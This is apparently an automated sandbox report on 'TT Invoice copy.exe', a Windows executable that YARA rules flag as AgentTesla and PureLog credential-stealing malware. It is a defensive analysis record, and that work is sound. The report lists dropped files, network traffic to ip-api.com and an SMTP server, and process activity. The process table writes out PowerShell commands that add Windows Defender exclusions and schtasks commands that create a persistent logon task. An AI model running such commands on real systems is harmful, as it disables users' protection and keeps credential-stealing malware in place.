                                                                                SHA-512:1EBCBDC9B90EF90A63FC56BAD69290084C9CA493CC98DB18B025A7EE20F1FD25738D58859C9D8B0DE64E317EA3E32EC901152A0088F017B83EB6DDCEBCB0C7E6
                                                                                Malicious:true
                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                Process:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                File Type:XML 1.0 document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):1573
                                                                                Entropy (8bit):5.111302380792291
                                                                                Encrypted:false
                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtag8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTB8v
                                                                                MD5:EC61904CC9DF3668924458C492EBC250
                                                                                SHA1:52F11617BF9BFD3F4FEC7D79F52DD18E2F3821FD
                                                                                SHA-256:CBBEDB375EFA910716421361E3AF4AA3371299A70B5F6028B2D3C774C3D715C7
                                                                                SHA-512:1EBCBDC9B90EF90A63FC56BAD69290084C9CA493CC98DB18B025A7EE20F1FD25738D58859C9D8B0DE64E317EA3E32EC901152A0088F017B83EB6DDCEBCB0C7E6
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                Process:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):717312
                                                                                Entropy (8bit):7.877827859340402
                                                                                Encrypted:false
                                                                                SSDEEP:12288:pCazT37rXbgicYSDZQcwGTjM5ucgZgvZ3f3bIq/bVt3zA8mH:pFXbgicYO3DToeq3f3bN3cN
                                                                                MD5:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                SHA1:78424F07E9A07B41322A2A91FA71A7DB42A8DFD6
                                                                                SHA-256:76023EE62DB39B5F6E730247C677494D69EAD6467E2D2D313BA0F7A87F9CE977
                                                                                SHA-512:270C9CFE26EC1128A97A6EE0B52C27827D599A9A7720E97878AEB7886B85C78E20201AA513037BEA6D81897A1A2982DEE44C9AD5816666D7BBDFED18EEC2B714
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                                • Antivirus: Virustotal, Detection: 51%
                                                                                Process:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:false
                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.877827859340402
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:TT Invoice copy.exe
                                                                                File size:717'312 bytes
                                                                                MD5:bf78f7d9bb46ae5314ec7b6d9e651b23
                                                                                SHA1:78424f07e9a07b41322a2a91fa71a7db42a8dfd6
                                                                                SHA256:76023ee62db39b5f6e730247c677494d69ead6467e2d2d313ba0f7a87f9ce977
                                                                                SHA512:270c9cfe26ec1128a97a6ee0b52c27827d599a9a7720e97878aeb7886b85c78e20201aa513037bea6d81897a1a2982dee44c9ad5816666d7bbdfed18eec2b714
                                                                                SSDEEP:12288:pCazT37rXbgicYSDZQcwGTjM5ucgZgvZ3f3bIq/bVt3zA8mH:pFXbgicYO3DToeq3f3bN3cN
                                                                                TLSH:F7E41286B7ABCD96D09C5236C1D300040370974BB573D74B7BC9225DAE827EA8989F9F
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f..............0......&........... ........@.. .......................`............@................................
Icon Hash: 63f98d9d99a5899b
Entrypoint: 0x4ae82e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x661D7396 [Mon Apr 15 18:36:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xae7e0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x2378 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xac834 | 0xaca00 | 489c9f17a01e96063c0a6b4fe478a073 | False | 0.9298840853548154 | data | 7.886672511134331 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x2378 | 0x2400 | 03703d94eaa364a4408c8a441729ba1f | False | 0.8552517361111112 | data | 7.348564959434729 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb4000 | 0xc | 0x200 | acdf7793c9e66e4c09eb52e2361a8295 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb0130 | 0x1e09 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9348419820522825
RT_GROUP_ICON | 0xb1f3c | 0x14 | data | | | 1.05
RT_VERSION | 0xb1f50 | 0x23c | data | | | 0.46678321678321677
RT_MANIFEST | 0xb218c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 16, 2024 14:10:58.780589104 CEST | 55974 | 53 | 192.168.2.4 | 1.1.1.1
Apr 16, 2024 14:10:58.888901949 CEST | 53 | 55974 | 1.1.1.1 | 192.168.2.4
Apr 16, 2024 14:10:59.776738882 CEST | 61001 | 53 | 192.168.2.4 | 1.1.1.1
Apr 16, 2024 14:10:59.883135080 CEST | 53 | 61001 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 16, 2024 14:10:58.780589104 CEST | 192.168.2.4 | 1.1.1.1 | 0x4290 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Apr 16, 2024 14:10:59.776738882 CEST | 192.168.2.4 | 1.1.1.1 | 0xb7ed | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 16, 2024 14:10:58.888901949 CEST | 1.1.1.1 | 192.168.2.4 | 0x4290 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 14:10:59.883135080 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7ed | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.198.143 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 14:10:59.883135080 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7ed | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.199.224 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 14:10:59.883135080 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7ed | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.199.225 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 14:10:59.883135080 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7ed | No error (0) | us2.smtp.mailhostbox.com | - | 208.91.199.223 | A (IP address) | IN (0x0001) | false
                                                                                • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 208.95.112.1 | 80 | 7508 | C:\Users\user\Desktop\TT Invoice copy.exe

Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 14:10:59.015516996 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Apr 16, 2024 14:10:59.132834911 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Tue, 16 Apr 2024 12:10:59 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 208.95.112.1 | 80 | 7896 | C:\Users\user\AppData\Roaming\pUAQmWA.exe

Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 14:11:02.058990002 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Apr 16, 2024 14:11:02.181477070 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Tue, 16 Apr 2024 12:11:01 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 16, 2024 14:11:00.382766008 CEST | 587 | 49734 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 16, 2024 14:11:00.383255005 CEST | 49734 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 468325
Apr 16, 2024 14:11:00.537072897 CEST | 587 | 49734 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Apr 16, 2024 14:11:00.537468910 CEST | 49734 | 587 | 192.168.2.4 | 208.91.198.143 | STARTTLS
Apr 16, 2024 14:11:00.691555977 CEST | 587 | 49734 | 208.91.198.143 | 192.168.2.4 | 220 2.0.0 Ready to start TLS
Apr 16, 2024 14:11:02.905608892 CEST | 587 | 49738 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 16, 2024 14:11:02.914140940 CEST | 49738 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 468325
Apr 16, 2024 14:11:03.068171978 CEST | 587 | 49738 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Apr 16, 2024 14:11:03.068346977 CEST | 49738 | 587 | 192.168.2.4 | 208.91.198.143 | STARTTLS
Apr 16, 2024 14:11:03.222124100 CEST | 587 | 49738 | 208.91.198.143 | 192.168.2.4 | 220 2.0.0 Ready to start TLS


                                                                                Target ID:0
                                                                                Start time:14:10:54
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\TT Invoice copy.exe"
                                                                                Imagebase:0x330000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1633307056.0000000000332000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
                                                                                Imagebase:0xce0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                                                                                Imagebase:0xce0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"
                                                                                Imagebase:0x9e0000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:14:10:57
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:14:10:57
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\TT Invoice copy.exe"
                                                                                Imagebase:0x6e0000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2889363476.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2889363476.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:14:10:57
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                Imagebase:0x180000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 47%, ReversingLabs
                                                                                • Detection: 51%, Virustotal, Browse
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:14:10:59
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff693ab0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:14:11:00
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"
                                                                                Imagebase:0x9e0000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:14:11:00
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:14:11:00
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                                                                                Imagebase:0xdd0000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2888895822.000000000334B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:16
                                                                                Start time:14:11:21
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                  Execution Graph

                                                                                  Execution Coverage:8.5%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:125
                                                                                  Total number of Limit Nodes:12
                                                                                  execution_graph 24188 e31603 24189 e3158c 24188->24189 24190 e315ad 24189->24190 24191 e34428 6 API calls 24189->24191 24192 e3448e 6 API calls 24189->24192 24191->24190 24192->24190 24030 e31862 24031 e3158c 24030->24031 24032 e315ad 24031->24032 24035 e34428 24031->24035 24050 e3448e 24031->24050 24036 e34442 24035->24036 24037 e3444a 24036->24037 24066 e34d9e 24036->24066 24070 e34e79 24036->24070 24074 e34f9b 24036->24074 24080 e34d56 24036->24080 24086 e34db1 24036->24086 24090 e348b2 24036->24090 24094 e34eb2 24036->24094 24097 e34d6d 24036->24097 24101 e350a7 24036->24101 24104 e34827 24036->24104 24109 e34883 24036->24109 24113 e349bd 24036->24113 24037->24032 24051 e3441c 24050->24051 24052 e34491 24050->24052 24053 e34883 Wow64SetThreadContext 24051->24053 24054 e3444a 24051->24054 24055 e34827 2 API calls 24051->24055 24056 e350a7 WriteProcessMemory 24051->24056 24057 e34d6d ResumeThread 24051->24057 24058 e34eb2 VirtualAllocEx 24051->24058 24059 e348b2 Wow64SetThreadContext 24051->24059 24060 e34db1 ReadProcessMemory 24051->24060 24061 e34d56 2 API calls 24051->24061 24062 e34f9b 2 API calls 24051->24062 24063 e34e79 ResumeThread 24051->24063 24064 e34d9e ResumeThread 24051->24064 24065 e349bd WriteProcessMemory 24051->24065 24052->24032 24053->24054 24054->24032 24055->24054 24056->24054 24057->24054 24058->24054 24059->24054 24060->24054 24061->24054 24062->24054 24063->24054 24064->24054 24065->24054 24067 e34d74 24066->24067 24116 e30ca0 24067->24116 24071 e34e86 24070->24071 24073 e30ca0 ResumeThread 24071->24073 24072 e3527e 24073->24072 24075 e34fb7 24074->24075 24124 e30ee8 24075->24124 24076 e3489e 24076->24037 24077 e3488c 24077->24076 24120 e30d50 24077->24120 24081 e34df2 24080->24081 24082 e34d74 24080->24082 24084 e30d50 Wow64SetThreadContext 24081->24084 24085 e30ca0 ResumeThread 24082->24085 24083 e3527e 24084->24082 24085->24083 24128 e30fd8 24086->24128 
